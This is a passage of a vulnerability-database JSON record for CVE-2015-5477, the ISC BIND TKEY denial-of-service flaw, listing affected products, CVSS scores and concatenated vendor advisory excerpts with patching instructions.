null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "junos 12.1x44-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "junos 12.1x44-d35.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.3r10.2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "bind 9.5.2-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.18" }, { "model": "bind -p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos 13.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r1.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2x51-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2x51-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "northstar controller application", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2.1.0" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "junos 14.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.3" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "junos 14.1x53-d12", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x44-d32", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2x51-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "junos 13.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "8.4-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v4r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "junos 12.1x44-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null } ], "sources": [ { "db": "BID", "id": "76092" }, { "db": "CNNVD", "id": "CNNVD-201507-807" }, { "db": "NVD", "id": "CVE-2015-5477" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:isc:bind:*:p1:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.9.7", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:isc:bind:*:p2:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.10.2", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-5477" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jonathan Foote", "sources": [ { "db": "BID", "id": "76092" } ], "trust": 0.3 }, "cve": "CVE-2015-5477", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-5477", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-5477", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201507-807", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2015-5477", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5477" }, { "db": "CNNVD", "id": "CNNVD-201507-807" }, { "db": "NVD", "id": "CVE-2015-5477" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries. ISC BIND is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to cause a denial-of-service. \n\nRelease Date: 2015-08-18\nLast Updated: 2015-08-18\n\nPotential Security Impact: Remote Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX running\nBIND. This vulnerability could be exploited remotely to create a Denial of\nService (DoS). \n\nReferences:\n\nCVE-2015-5477\nCVE-2014-8500\nSSRT102211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.11 running BIND 9.3.2 prior to C.9.3.2.14.0\nHP-UX B.11.23 running BIND 9.3.2 prior to C.9.3.2.14.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5477 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2014-8500 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided updated versions of the BIND service to resolve this\nvulnerability. \n\nBIND 9.3.2 for HP-UX Release\n Depot Name\n Download location\n\nB.11.11 (PA and IA)\n HP_UX_11.11_DNSUPGRADE_C.9.3.2.14.0_HP-UX_B.11.11_32_64.depot\n https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe\nr=BIND\n\nBIND 9.3.2 for HP-UX Release\n Depot Name\n Download location\n\nB.11.23 (PA and IA)\n HP_UX_11.23_DNSUPGRADE_C.9.3.2.14.0_HP-UX_B.11.23_IA_PA.depot\n https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumbe\nr=BIND\n\nMANUAL ACTIONS: Yes - Update\nDownload and install the software update\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nBindUpgrade.BIND-UPGRADE\naction: install revision C.9.3.2.14.0 or subsequent\n\nHP-UX B.11.23\n==================\nBindUpgrade.BIND-UPGRADE\nBindUpgrade.BIND2-UPGRADE\naction: install revision C.9.3.2.14.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 18 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:17.bind Security Advisory\n The FreeBSD Project\n\nTopic: BIND remote denial of service vulnerability\n\nCategory: contrib\nModule: bind\nAnnounced: 2015-07-28\nCredits: ISC\nAffects: FreeBSD 8.x and FreeBSD 9.x. \nCorrected: 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\n 2015-07-28 19:58:54 UTC (stable/8, 8.4-STABLE)\n 2015-07-28 19:59:22 UTC (releng/8.4, 8.4-RELEASE-p35)\nCVE Name: CVE-2015-5477\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nII. \n\nIII. Impact\n\nA remote attacker can trigger a crash of a name server. Both recursive and\nauthoritative servers are affected, and the exposure can not be mitigated\nby either ACLs or configuration options limiting or denying service because\nthe exploitable code occurs early in the packet handling, before checks\nenforcing those boundaries. \n\nIV. Workaround\n\nNo workaround is available, but systems that are not running BIND are not\nvulnerable. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. A reboot is\nrecommended but not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nThe named service has to be restarted after the update. A reboot is\nrecommended but not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch.asc\n# gpg --verify bind.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the applicable daemons, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r285977\nreleng/8.4/ r285980\nstable/9/ r285977\nreleng/9.3/ r285980\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. This issue was addressed by updating BIND to version\n9.9.7-P2. \nCVE-ID\nCVE-2015-5477\n\n\nOS X Server v4.1.5 may be obtained from the Mac App Store. \nVCX prior to 9.8.18 with OpenSSH or ISC BIND. \n\n+ VCX 9.8.18 for the following Products/SKUs:\n\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n\nHISTORY\nVersion:1 (rev.1) - 28 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\n Platform\n Patch Kit Name\n\n Alpha OpenVMS V8.4\n QXCM1001434254_4652022589_2015-08-28.BCK\n\n ITANIUM OpenVMS V8.4\n QXCM1001434254_4652022589_2015-08-28.BCK\n\n NOTE: Please contact OpenVMS Technical Support to request these patch kits. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: bind security update\nAdvisory ID: RHSA-2016:0078-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0078.html\nIssue date: 2016-01-28\nCVE Names: CVE-2014-8500 CVE-2015-5477 CVE-2015-5722 \n CVE-2015-8000 \n=====================================================================\n\n1. Summary:\n\nUpdated bind packages that fix multiple security issues are now available\nfor Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 6.4) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.5) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5) - i386, ppc64, s390x, x86_64\n\n3. Description:\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly. \n\nA denial of service flaw was found in the way BIND followed DNS\ndelegations. A remote attacker could use a specially crafted zone\ncontaining a large number of referrals which, when looked up and processed,\nwould cause named to use excessive amounts of memory or crash. \n(CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet. \n(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. A remote attacker could use this flaw to send a specially\ncrafted DNS query (for example, a query requiring a response from a zone\ncontaining a deliberately malformed key) that would cause named functioning\nas a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use this\nflaw to send a query to request a cached record with a malformed class\nattribute that would cause named functioning as an authoritative or\nrecursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs. \n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan\nFoote as the original reporter of CVE-2015-5477, and Hanno B\u00f6ck as the\noriginal reporter of CVE-2015-5722. \n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdate, the BIND daemon (named) will be restarted automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1171912 - CVE-2014-8500 bind: delegation handling denial of service\n1247361 - CVE-2015-5477 bind: TKEY query handling flaw leading to denial of service\n1259087 - CVE-2015-5722 bind: malformed DNSSEC key failed assertion denial of service\n1291176 - CVE-2015-8000 bind: responses with a malformed class attribute can trigger an assertion failure in db.c\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 6.4):\n\nSource:\nbind-9.8.2-0.17.rc1.el6_4.7.src.rpm\n\ni386:\nbind-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-chroot-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-utils-9.8.2-0.17.rc1.el6_4.7.i686.rpm\n\nppc64:\nbind-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-chroot-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.ppc.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-utils-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\n\ns390x:\nbind-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-chroot-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.s390.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-utils-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\n\nx86_64:\nbind-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-chroot-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-utils-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.2.src.rpm\n\ni386:\nbind-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.2.i686.rpm\n\nppc64:\nbind-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.ppc.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\n\ns390x:\nbind-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.s390.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\n\nx86_64:\nbind-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 